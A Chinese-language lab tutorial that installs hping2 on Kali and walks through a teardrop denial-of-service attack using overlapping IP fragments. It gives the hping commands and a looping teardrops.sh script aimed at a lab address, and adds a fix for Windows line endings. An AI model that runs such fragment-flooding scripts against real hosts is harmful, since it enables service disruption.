teardrops(淚滴攻擊)
用ssh把hping2.0.0-rc3.tar.gz上傳到kali的 /usr/local目錄下
進入/usr/local目錄并查看其下面的文件
利用tar –zxvf hping2.0.0-rc3.tar.gz命令解壓縮。
進入 /usr/loca/hping2-rc3/ 目錄
-
利用./configure命令進行配置,最下端有提示你用make命令進行編譯
- 在redhat下可能會沒有gcc,會出現 cc:command not foud錯誤 ,此時需要安裝gcc
沒有錯誤可以進行編譯,輸入make命令進行編譯;會看到兩項提示的配置。
- 按照提示以此運行,make strip 和make install 安裝
利用命令 hping2 –h 查看hping2的命令幫助,關于hping2的安裝與查看部分就完成了
-
構造兩個重疊便宜的IP分片
- ./hping 192.168.1.1 -1 –x –d 1000 –N 100 –c 1
- ./hping 192.168.1.1 -1 –d 200 –g 400 –N 100 –c 1
- //構造了兩個ICMP請求ip包分片,第一個載荷量1000,標識100,第二個載荷量200標識100,但本應偏移量為1008,可他卻設置了400,這樣在分片重組時就會重疊,老的Linux內核(1.x - 2.0.x)在處理這種重疊分片的時候存在問題,WinNT/95在接收到10至50個teardrop分片時也會崩潰。。如果將向上述命令寫入腳本,并用循環語句,持續發送,就成了發送淚滴攻擊的攻擊程序了。
-
在桌面上已經有寫好的淚滴攻擊程序,用 cat teardrops.sh 命令查看程序內容,如果需要修改目標主機IP,
用命令vi teardrops.sh進行編輯-
teardrops.sh腳本:
#!/bin/bash for((i=100;i<150;i++)) do hping 192.168.1.75 -1 -x -d 1000 -N $i -c 1 hping 192.168.1.75 -1 -d 200 -g 400 -N $i -c 1 done
-
利用命令.teardrops.sh執行腳本,若出現沒有權限的字符,利用命令chmod 755 teardrops.sh提高權限,若出現v/bin/sh^M:bad interpreter:NO such file ordirectory,請查看下面的注釋一。
重新執行teardrops.sh腳本就實現了淚滴攻擊
注釋一
在Linux中執行.sh腳本,異常/bin/sh^M: bad interpreter: No such file or directory。
分析:這是不同系統編碼格式引起的:在windows系統中編輯的.sh文件可能有不可見字符,所以在Linux系統下執行會報以上異常信息。
解決:1)在windows下轉換:
利用一些編輯器如UltraEdit或EditPlus等工具先將腳本編碼轉換,再放到Linux中執行。轉換方式如下(UltraEdit):File-->Conversions-->DOS->UNIX即可。
2)也可在Linux中轉換:
- 首先要確保文件有可執行權限
- sh>chmod a+x filename
- 然后修改文件格式
- sh>vi filename
- 利用如下命令查看文件格式
- :set ff 或 :set fileformat
- 可以看到如下信息
- fileformat=dos 或 fileformat=unix
- 利用如下命令修改文件格式
- :set ff=unix 或 :set fileformat=unix
- :wq (存盤退出)
- 最后再執行文件
- sh>./filename